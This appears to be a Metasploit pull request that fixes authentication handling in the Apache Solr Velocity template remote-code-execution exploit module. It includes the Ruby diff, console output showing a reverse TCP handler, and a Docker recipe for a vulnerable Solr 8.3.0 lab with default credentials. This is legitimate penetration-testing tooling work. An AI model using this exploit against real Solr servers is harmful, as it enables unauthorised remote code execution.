### PR TITLE
Apache Solr RCE via Velocity Template: Attempt fix for NoMethodError when exploiting

### DIFF
--- a/modules/exploits/multi/http/solr_velocity_rce.rb
+++ b/modules/exploits/multi/http/solr_velocity_rce.rb
@@ -105,6 +105,11 @@ class MetasploitModule < Msf::Exploit::Remote
         ],
         'DisclosureDate' => '2019-10-29', # ISO-8601 formatted
         'DefaultTarget' => 0,
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [CONFIG_CHANGES]
+        },
         'Privileged' => false
       )
     )
@@ -128,7 +133,10 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def check_auth
     # see if authentication is required for the specified Solr instance
-    auth_check = solr_get('uri' => normalize_uri(target_uri.path))
+    auth_check = solr_get(
+      'uri' => normalize_uri(target_uri.path, '/admin/info/system'),
+      'vars_get' => { 'wt' => 'json' }
+    )
 
     # successfully connected?
     unless auth_check
@@ -146,13 +154,18 @@ class MetasploitModule < Msf::Exploit::Remote
 
       # otherwise, try the given creds
       auth_string = basic_auth(datastore['USERNAME'], datastore['PASSWORD'])
-      attempt_auth = solr_get('uri' => normalize_uri(target_uri.path), 'auth' => auth_string)
+      attempt_auth = solr_get(
+        'uri' => normalize_uri(target_uri.path, '/admin/info/system'),
+        'vars_get' => { 'wt' => 'json' },
+        'auth' => auth_string
+      )
 
       # successfully connected?
       unless attempt_auth
         print_bad('Connection failed!')
         return nil
       end
+
       # if the return code is not 200, then authentication definitely failed
       unless attempt_auth.code == 200
         print_bad('Invalid credentials!')
@@ -167,9 +180,13 @@ class MetasploitModule < Msf::Exploit::Remote
       )
 
       @auth_string = auth_string
+      # return the response for use in check/exploit
+      return attempt_auth
     end
-    # a placeholder return value. Not requiring auth should throw no errors
-    ''
+
+    print_status("#{peer}: Authentication not required")
+    # return the response for use in check/exploit
+    auth_check
   end
 
   # check for vulnerability existence
@@ -179,20 +196,8 @@ class MetasploitModule < Msf::Exploit::Remote
       return CheckCode::Unknown('Authentication failed!')
     end
 
-    # send a GET request to get Solr and system details
-    ver = solr_get(
-      'uri' => normalize_uri(target_uri.path, '/admin/info/system'),
-      'vars_get' => { 'wt' => 'json' },
-      'auth' => @auth_string
-    )
-
-    # can't connect? that's an automatic failure
-    unless ver
-      return CheckCode::Unknown('Connection failed!')
-    end
-
     # convert to JSON
-    ver_json = ver.get_json_document
+    ver_json = auth_res.get_json_document
     # get Solr version
     solr_version = Rex::Version.new(ver_json['lucene']['solr-spec-version'])
     print_status("Found Apache Solr #{solr_version}")
@@ -377,7 +382,7 @@ class MetasploitModule < Msf::Exploit::Remote
     case target.name
     when /Java/
       @classloader_uri = start_service
-      execute_java('core_name' => @vuln_core[0])
+      execute_java('core_name' => @vuln_core[0], 'auth_string' => @auth_string)
       return
     end
 


### PR DESCRIPTION
## Description

In a recent engagement, I came across Apache Solr 8.3.0 on Linux that required authentication. The module failed on me with:
```
msf6 exploit(multi/http/solr_velocity_rce) > check

[-] Exploit failed: NoMethodError undefined method `[]' for nil:NilClass
[-] 172.21.101.7:8983 - Check failed: The state could not be determined.
```

Same error for `exploit`:
```
msf6 exploit(multi/http/solr_velocity_rce) > exploit

[*] Started reverse TCP handler on 172.18.112.14:4444 
[-] Exploit failed: NoMethodError undefined method `[]' for nil:NilClass
[*] Exploit completed, but no session was created.
```

No problem occurs when the target does not require authentication. Digging into it a bit at home revealed that:

1. The `Java (in-memory)` target was not playing nice with authentication - fixed in this PR.
2. `Linux (dropper)` payloads do not seem to work as expected. The payload does get downloaded and operated on, but a shell never pops. This was also the case before modifications.

I have not yet tested this modified module against Windows targets.

## Minimal test case to reproduce using Docker

In a directory with the following setup:
```
ubuntu@machina:~/Documents/solr$ tree
.
├── Dockerfile
└── security
    └── security.json

1 directory, 2 files
```

Where the contents of the `Dockerfile` are:
```
FROM solr:8.3.0
ENV SOLR_USER="solr" \
    SOLR_GROUP="solr"
USER root
COPY --chown=solr:solr security/security.json /var/solr/data/security.json.bak
USER $SOLR_USER
```

And the contents of the `security/security.json` file are:
```
{
"authentication":{ 
   "blockUnknown": true, 
   "class":"solr.BasicAuthPlugin",
   "credentials":{"solr":"IV0EHq1OnNrj6gvRCwvFwTrZ1+z1oBbnQdiVC3otuq0= Ndd7LKvVBAaZIF0QAVi1ekCfAJXr1GGfLtRUXhgrF8c="}, 
   "realm":"My Solr users", 
   "forwardCredentials": false 
},
"authorization":{
   "class":"solr.RuleBasedAuthorizationPlugin",
   "permissions":[{"name":"security-edit",
      "role":"admin"}], 
   "user-role":{"solr":"admin"} 
}}
```

This will set the username and password to `solr:SolrRocks`.

Execute the following commands to create a Solr 8.3.0 Docker container and configure it:
```
docker build . -f Dockerfile -t solr_830
docker run --name solr_830 -d -p 8983:8983 -t solr_830
docker exec -it --user=solr solr_830 bin/solr create -c techproducts -d sample_techproducts_configs
docker exec -it --user=root solr_830 mv /var/solr/data/security.json.bak /var/solr/data/security.json
docker restart solr_830
```

## Verification

1. `msfconsole`
2. `use exploit/multi/http/solr_velocity_rce`
3. `set LHOST <target_ip>`
4. `check` or `exploit` and observe the error

## TODO

- [x] Test modified module against Windows targets (`x86/x64 Windows PowerShell`, `x86/x64 Windows CmdStager`, and `Windows Exec`) to make sure they work as expected
- [x] Figure out why `Linux (dropper)` doesn't work